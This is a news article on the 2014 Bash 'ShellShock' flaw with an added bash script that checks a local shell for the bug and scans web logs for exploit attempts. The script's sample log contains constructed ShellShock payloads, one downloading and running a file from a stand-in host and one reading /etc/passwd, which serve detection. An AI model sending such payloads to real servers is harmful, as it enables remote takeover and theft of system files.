Security Advisor

Millions of Systems and Devices Vulnerable to Bash 'ShellShock' Flaw

The 25-year-old flaw, publicly disclosed on Wednesday, leaves systems running Linux and Mac OS X open to remote code execution attacks.

Security researchers have discovered a flaw in the Bourne Again Shell (Bash), the command shell used on most Unix-based open source platforms, that could leave Linux and OS X systems and connected devices like routers and webcams vulnerable to attack. The flaw also leaves a huge hole in the estimated half of all Web sites that run on affected servers.

Discovered by security researcher Stephane Chazelas and disclosed late Wednesday night, the Bash shell vulnerability, called "ShellShock" (CVE-2014-6271), could affect more systems than the Heartbleed flaw disclosed in April. While Heartbleed could allow attackers to extract information from targeted systems, ShellShock could lead to systems being completely taken over.

"Basically this vulnerability allows an attacker to perform remote code execution attacks on any server using the Bash shell," commented David Jacoby, Senior Security Researcher at Kaspersky Lab. "Unfortunately use of this shell is widespread -- it is used in many server products, including those powering Web sites."

Shortly after the flaw was disclosed, the GNU Project released a patch for Bash. However, according to Red Hat, the fix did not fully close the hole (the remaining issue is tracked as CVE-2014-7169), and the firm expects GNU to release a more complete patch sometime today.

And there's worse news: within 24 hours of the ShellShock disclosure, researchers were already seeing exploits in the wild. Security researcher "Yinette" reported the first known exploit of the bug late last night: a payload that includes distributed denial of service (DDoS) functionality and automated brute-force password attacks.

While there is no word on when a complete fix for Linux and Apple users will arrive, IT should watch for the updated packages and apply them immediately. In the meantime, IT should monitor for network attacks that attempt to exploit the hole through Internet-facing services such as Web servers, since the exploit rides inside otherwise ordinary requests that a firewall will not block on its own.
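Two checks a practitioner would want after reading the advice above, as an added example that is not from the article or from any vendor advisory: the widely circulated one-line test for the original flaw (CVE-2014-6271), wrapped in a function that reports the result, and a simple detection pass over Web-server logs for the "() {" prefix that every exploit attempt against this bug must carry. The function names are my own, and the log lines are constructed for this example. The route by which attacker text reaches Bash on a Web server is CGI: the server copies request headers such as User-Agent and Referer into environment variables (HTTP_USER_AGENT, HTTP_REFERER) before starting the script, and a vulnerable Bash executes whatever follows the function body while importing that environment.

```bash
#!/usr/bin/env bash
# Added example, not part of the article: two checks for the first day after
# the ShellShock (CVE-2014-6271) disclosure.
#
# shellshock_check     - run the publicly circulated test string against a
#                        local bash and report "vulnerable" or "patched".
# scan_for_shellshock  - count Web-server log lines whose logged headers
#                        begin with the function-definition prefix "() {".
# shellshock_sources   - list the client addresses behind those lines.

shellshock_check() {
    local bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    # The variable value mimics an exported function "() { :;}" followed by
    # a trailing command. A vulnerable bash runs the trailing command while
    # importing its environment; a fixed bash treats x as plain data.
    local out
    out="$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo test' 2>/dev/null)"
    case "$out" in
        *vulnerable*) echo "vulnerable"; return 1 ;;
        *)            echo "patched";    return 0 ;;
    esac
}

# Apache-style combined log lines, constructed for this example. The first
# and third lines carry exploit attempts in the User-Agent and Referer
# fields; the fourth contains "() {" in the middle of a User-Agent, where
# bash would never treat it as a function definition.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:02:14:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x; chmod +x x; ./x\""
198.51.100.9 - - [25/Sep/2014:02:14:09 +0000] "GET /index.html HTTP/1.1" 200 3120 "-" "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/32.0"
203.0.113.5 - - [25/Sep/2014:02:15:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { ignored;}; echo; /bin/cat /etc/passwd" "curl/7.37.0"
192.0.2.44 - - [25/Sep/2014:02:16:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 () { not a function }"'

scan_for_shellshock() {
    # Bash only parses an imported variable as a function when its value
    # starts with the exact four characters "() {", so anchor on the opening
    # quote of a logged header field rather than matching the string anywhere.
    grep -c '"() {'
}

shellshock_sources() {
    grep '"() {' | awk '{ print $1 }' | sort -u
}

printf 'local bash: %s\n' "$(shellshock_check || true)"
printf 'exploit attempts in sample log: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | scan_for_shellshock)"
printf 'attacking hosts: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | shellshock_sources | tr '\n' ' ')"
```

Two caveats. The test string only exercises the original bug; the incomplete first fix (CVE-2014-7169) has its own test, so a "patched" result here is not the end of the job. And the log check only sees what the server writes to its access log, which for the combined format is User-Agent and Referer; an attacker who puts the payload in another header, or in the query string of a CGI request, will not show up in this pass.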

Because Windows and Windows Server do not use the Bash shell, ShellShock is not a direct threat to Microsoft software. But that doesn't mean Windows shops are in the clear. Microsoft MVP Troy Hunt noted in a blog post on ShellShock that Windows shops are rarely, if ever, 100 percent Windows.

"There are non-Microsoft components sitting in front of their Microsoft application stack, components that the traffic needs to pass through before it hits the web servers," wrote Hunt. "These are also components that may have elevated privileges behind the firewall -- what's the impact if Shellshock is exploited on those? It could be significant and that's the point I'm making here; Shellshock has the potential to impact assets beyond just at-risk Bash implementations when it exists in a broader ecosystem of other machines."

Just like Heartbleed, the ShellShock flaw went unnoticed for decades, which has allowed it to lie dormant in numerous connected devices. Robert Graham, security expert at Errata Security, commented that when flaws like this are discovered, it's embarrassing for IT staff who have worked alongside the code for years.

"So we've known for 20 years that this is a problem, so why does it even happen? I think the problem is that most people don't know how things work," wrote Graham. "Like the IT guy 20 years ago, they can't look at it and immediately understand the implications and see what's wrong. So, they keep using it. This perpetuates itself into legacy code that we can never get rid of. It's mainframes, 20 years out of date and still a 50-billion dollar a year business for IBM."

About the Author

Chris Paoli is the site producer for and


  • Microsoft Warns IT Pros on Windows Netlogon Fix Coming Next Month

    Microsoft on Thursday issued a reminder to organizations to ensure that their systems are properly patched for a "Critical"-rated Windows Netlogon vulnerability before next month's "update Tuesday" patch distribution arrives.

  • Microsoft Nudging Skype for Business Users to Teams

    Microsoft on Thursday announced some perks and prods for Skype for Business unified communications users, with the aim of moving them to the Microsoft Teams collaboration service instead.

  • How To Improve Windows 10's Sound and Video Quality

    Windows 10 comes with built-in tools that can help users get the most out of their sound and video hardware.

  • Microsoft Offers More 'Solorigate' Advice Using Microsoft 365 Defender Tools

    Microsoft issued yet another article with advice on how to use its Microsoft 365 Defender suite of tools to protect against "Solorigate" advanced persistent threat types of attacks in a Thursday announcement.

comments powered by Disqus